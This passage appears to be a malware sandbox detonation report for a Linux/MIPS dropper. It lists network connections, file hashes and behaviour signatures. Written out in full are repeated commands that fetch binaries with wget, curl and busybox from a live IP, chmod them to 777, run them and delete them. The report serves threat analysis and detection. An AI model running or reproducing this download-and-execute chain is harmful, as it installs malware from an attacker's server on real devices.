[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 02:59
Reported
2024-11-20 03:02
Platform
debian9-mipsel-20240729-en
Max time kernel
96s
Max time network
99s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
